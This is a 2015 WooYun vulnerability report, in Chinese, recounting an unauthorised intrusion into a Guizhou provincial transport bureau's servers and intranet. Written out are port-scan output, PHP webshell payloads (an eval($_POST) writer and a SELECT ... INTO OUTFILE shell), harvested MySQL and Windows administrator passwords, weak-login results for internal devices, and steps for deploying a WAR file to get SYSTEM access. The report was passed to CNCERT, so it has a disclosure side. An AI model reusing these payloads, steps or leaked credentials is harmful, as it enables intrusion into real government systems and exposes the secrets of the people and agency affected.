当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0102878

漏洞标题:贵州交通局内网可被成功漫游

相关厂商:贵州某部门

漏洞作者: wilson

提交时间:2015-03-21 21:19

修复时间:2015-05-10 08:22

公开时间:2015-05-10 08:22

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-21: 细节已通知厂商并且等待厂商处理中
2015-03-26: 厂商已经确认,细节仅向厂商公开
2015-04-05: 细节向核心白帽子及相关领域专家公开
2015-04-15: 细节向普通白帽子公开
2015-04-25: 细节向实习白帽子公开
2015-05-10: 细节向公众公开

简要描述:

一次简单的内网渗透

详细说明:

一)好久没有动了,和朋友一起玩玩
www.gzjjzd.gov.cn
直接日 搞不定
扫描一下端口

Nmap scan report for 222.85.179.17
Host is up (0.067s latency).
Not shown: 976 closed ports
PORT     STATE    SERVICE        VERSION
21/tcp   open     ftp            vsftpd 2.0.8 or later
23/tcp   open     telnet         H3C switch telnetd
80/tcp   open     http           Microsoft IIS httpd
113/tcp  filtered ident
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
199/tcp  filtered smux
445/tcp  filtered microsoft-ds
593/tcp  filtered http-rpc-epmap
801/tcp  filtered device
1023/tcp filtered netvenuechat
1025/tcp filtered NFS-or-IIS
1068/tcp filtered instl_bootc
3389/tcp open     ms-wbt-server  Microsoft Terminal Service
4444/tcp filtered krb524
5000/tcp open     tcpwrapped
5060/tcp open     sip            Brekeke SIP Server rev.286.1 (Status: 100 Trying)
5555/tcp open     freeciv?
7625/tcp open     http           Apache Tomcat/Coyote JSP engine 1.1
7627/tcp open     http           Apache Tomcat/Coyote JSP engine 1.1
8080/tcp open     http           Apache Tomcat/Coyote JSP engine 1.1
8088/tcp open     http           Microsoft IIS httpd 6.0
8099/tcp open     unknown
8500/tcp filtered fmtp


看到这个:
www.gzjjzd.gov.cn:5333/PMS2_0/?q=user/password
Drupal的注入
教程:drops.wooyun.org/papers/3197
尝试payload
爆出路径:/var/www/PMS2_0/
成功进一个 用户名为:owned,密码是thanks的管理员

01.PNG


后台getshell:
教程:qqhack8.blog.163.com/blog/static/11414798520149225199423/
这样可以执行php代码了

02.PNG


如何直接写shell吧
<?php $a="<?php eval($"."_POST[xxs);?>";fputs(fopen("./shell.php","w"),$a);?>

03.PNG


看了看phpinfo()

4.png


发现貌似做了端口映射,本机的ip是:192.168.3.206
--------------------========------------------------
二)开始内网遨游
2.1密码收集:
Mysql:

root@gzkl10623777
gz122@gzklgz122
gcvms@123456
phpmyadmin@gzkl10623777
klsms@gzklgz122
kailin_zf@10623777


2.2sscoket 进内网
安装ssocket进内网,教程看着这里:
www.freebuf.com/articles/system/12182.html
好了,开始内网遨游~
这里不急着提权root,看看mysql的密码能不能进root
ok 运气不错 进去了

5.PNG


2.3扫描
端口扫描加扫描一下弱口令:

ftp service has:
       ['192.168.3.1:21', '192.168.3.206:21']
Unknown service has:
       ['192.168.3.240:445', '192.168.3.30:80', '192.168.3.32:80', '192.168.3.36:80', '192.168.3.34:80', '192.168.3.35:80', '192.168.3.37:80', '192.168.3.33:80', '192.168.3.31:80', '192.168.3.240:8080', '192.168.3.206:28017']
http service has:
       ['192.168.3.231:80', '192.168.3.66:80', '192.168.3.74:80', '192.168.3.80:80', '192.168.3.107:80', '192.168.3.67:80', '192.168.3.241:80', '192.168.3.215:80', '192.168.3.232:80', '192.168.3.206:27017', '192.168.3.248:80', '192.168.3.206:80', '192.168.3.206:8080', '192.168.3.117:80', '192.168.3.237:80', '192.168.3.95:80', '192.168.3.136:80', '192.168.3.87:80', '192.168.3.70:80', '192.168.3.155:80', '192.168.3.94:80', '192.168.3.236:8080', '192.168.3.78:80', '192.168.3.248:8080', '192.168.3.95:8080', '192.168.3.240:80']
smb service has:
       ['192.168.3.25:445', '192.168.3.95:445', '192.168.3.136:445', '192.168.3.117:445', '192.168.3.253:445', '192.168.3.248:445', '192.168.3.249:445', '192.168.3.28:445']
weaken password:
192.168.3.136 smb at 445 has weaken password!!-------administrator:123
192.168.3.206 mongodb service at 27017 allow login Anonymous login!!


发现一个smb 弱口令和 mongodb的弱口令
想办法执行192.168.3.136的命令:
用pyinstaller给psexec.py 转化为二进制的形式 再linux上面执行
但是发现卡着不动了,没成功执行命令。不知道是不是因为win2008的的什么条件设定了?

6.PNG


2.4内网的web渗透
继续看看有没有别web的好玩东西,由于内网管理员防范意识明显减低了~
开始手工测试弱口令~
One:
192.168.3.74 好像是什么voip电话
admin:admin 进去了

7.PNG


Two:
192.168.3.30/Login.htm
admin:12345 进去了
其实也就是这个:
www.gzjjzd.gov.cn:5000/Login.htm
貌似是一个交通摄像头 可惜加载不出画面。。

8.PNG


There:
192.168.3.95:8080/index.php?lang=en-iso-8859-1&convcharset=iso-8859-1 phpmyadmin
root:123456 弱口令~
爆出路径:
192.168.3.95:8080/index.php?lang[]=1

9.png


SELECT '<?php phpinfo();eval($_POST[a]);?>' INTO OUTFILE 'D:\\host\\phpMyAdmin\\libraries\\test2.php'
ok 成功getshell
再通过 php代理脚本去用菜刀连接内网中的服务器192.168.3.95:
ok~

10.PNG


并找到mssql数据库配置文件,许多数据泄露。。

20.PNG


但是用菜刀不能执行命令?上传大马来提权吧

11.PNG


发现有360提权失败
继续找别的玩玩
Four:
192.168.3.62:99/OAapp/WebObjects/OAapp.woa/wo/com.oa8000.proj.root.Main/W04Vk6bo9HbblLGR3zRrlM/4.14
user:123456 可以进入
华天动力oa 默认密码
www.wooyun.org/bugs/wooyun-2010-072735
默认账号admin/htoa登陆tomcat后台
直接部署一个war getshell
system权限

12.PNG


读密码:
UserName: Administrator
LogonDomain: GZKL-9DE8D3523D
password: 10623777

13.PNG


全程无脱库,只为刷rank。求不抓

漏洞证明:

修复方案:

版权声明:转载请注明来源 wilson@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-03-26 08:21

厂商回复:

CNVD确认并复现所述情况(测试第一层风险),已经转由CNCERT下发给贵州分中心,同时同步向交通部通报中心通报.

最新状态:

暂无